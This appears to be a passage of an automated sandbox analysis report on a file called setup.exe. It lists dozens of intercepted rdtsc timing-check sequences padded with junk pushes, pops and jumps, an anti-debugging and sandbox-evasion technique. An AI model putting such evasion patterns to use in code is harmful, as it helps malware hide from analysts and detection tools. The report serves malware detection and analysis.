                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64B3FC second address: 64B446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FC169461A9Dh 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 ja 00007FC169461AABh 0x00000016 push ebx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b ja 00007FC169461A96h 0x00000021 push edi 0x00000022 pop edi 0x00000023 jnl 00007FC169461A96h 0x00000029 popad 0x0000002a push esi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 59C328 second address: 59C32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 649414 second address: 649419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 649419 second address: 64941F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64941F second address: 64943D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC169461A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC169461AA0h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64943D second address: 649441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6496FC second address: 64971A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC169461AA0h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64971A second address: 64973B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Bh 0x00000007 jmp 00007FC16945A27Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64973B second address: 649755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 649755 second address: 64976F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A286h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64976F second address: 649779 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC169461A96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64A2A9 second address: 64A2AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64A590 second address: 64A59B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FC169461A96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64CA6E second address: 64CA74 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64CA74 second address: 64CA8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jns 00007FC169461A96h 0x0000000f pop edi 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64CA8A second address: 64CA8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64CA8F second address: 64CA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64CA95 second address: 64CAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64CAA1 second address: 64CABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64F97C second address: 64F980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64F980 second address: 64F9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC169461A96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FC169461AA3h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64FC68 second address: 64FC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64FC6C second address: 64FC76 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC169461A96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64FD93 second address: 64FD97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64FD97 second address: 64FDCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC169461A96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jne 00007FC169461AB5h 0x00000014 js 00007FC169461A96h 0x0000001a jmp 00007FC169461AA9h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64FDCD second address: 64FDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64FF35 second address: 64FF3B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64FF3B second address: 64FF41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 64FF41 second address: 64FF4B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC169461A9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 659FD9 second address: 659FE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 659FE4 second address: 65A018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC169461AA5h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC169461AA5h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 65A310 second address: 65A316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 65A316 second address: 65A31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 65A31C second address: 65A339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 je 00007FC16945A276h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jp 00007FC16945A276h 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 65A339 second address: 65A33D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 65A33D second address: 65A35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FC16945A27Ch 0x0000000e jbe 00007FC16945A27Ah 0x00000014 pushad 0x00000015 popad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 65ACD5 second address: 65ACDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 65ACDD second address: 65ACE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 65BBA3 second address: 65BBAD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC169461A96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 663058 second address: 663069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC16945A276h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 663069 second address: 66307F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC169461A9Fh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 662D8A second address: 662D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6661C7 second address: 6661CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 66F48F second address: 66F4A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FC16945A278h 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 66F4A8 second address: 66F4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FC169461A9Ch 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 66F4BB second address: 66F4C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 66F4C2 second address: 66F4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 67F481 second address: 67F486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 67F306 second address: 67F310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 67F310 second address: 67F31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FC16945A276h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6855DC second address: 6855E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6855E0 second address: 6855E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6855E4 second address: 6855F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FC169461A9Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6855F2 second address: 6855F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 68783E second address: 687872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461A9Fh 0x00000009 js 00007FC169461A96h 0x0000000f jmp 00007FC169461AA7h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 688F74 second address: 688F7D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 68E150 second address: 68E158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 68E2B1 second address: 68E2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 68E2B5 second address: 68E2B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 68E68B second address: 68E6BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A284h 0x00000007 jmp 00007FC16945A282h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 68E6BB second address: 68E6ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FC169461A9Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC169461AA4h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 68E6ED second address: 68E6F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 693760 second address: 693764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 693764 second address: 693771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6A2DC2 second address: 6A2DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA6h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6A2DDC second address: 6A2DE9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6A2DE9 second address: 6A2DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6A2DF2 second address: 6A2E1E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007FC16945A285h 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6B0635 second address: 6B063F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC169461A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6B063F second address: 6B065C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A289h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6B065C second address: 6B067A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC169461AA6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6B067A second address: 6B0699 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007FC16945A288h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6B3476 second address: 6B347E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6B347E second address: 6B3482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6B3482 second address: 6B3486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6B31CD second address: 6B31D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6B31D1 second address: 6B31E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FC169461A98h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f js 00007FC169461AA0h 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CBDD5 second address: 6CBE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FC16945A286h 0x0000000b jmp 00007FC16945A27Bh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CBE03 second address: 6CBE19 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC169461A96h 0x00000008 jmp 00007FC169461A9Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CBE19 second address: 6CBE79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC16945A283h 0x00000008 jmp 00007FC16945A284h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jc 00007FC16945A2A5h 0x00000020 jmp 00007FC16945A27Ah 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC16945A281h 0x0000002c jbe 00007FC16945A276h 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CB039 second address: 6CB043 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC169461A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CB043 second address: 6CB063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A286h 0x00000009 jo 00007FC16945A276h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CB063 second address: 6CB069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CB58C second address: 6CB590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CB590 second address: 6CB5B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC169461AA9h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CE7C6 second address: 6CE7CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CE84C second address: 6CE856 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC169461A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D00F7 second address: 6D00FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D1BBD second address: 6D1BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D1BC1 second address: 6D1BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D178C second address: 6D17AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FC169461A9Ah 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D17AB second address: 6D17B5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC16945A276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D3521 second address: 6D353A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC169461AA3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D353A second address: 6D353E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D353E second address: 6D3552 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D3552 second address: 6D3563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jno 00007FC16945A276h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5110160 second address: 5110187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC169461AA9h 0x00000013 rdtsc
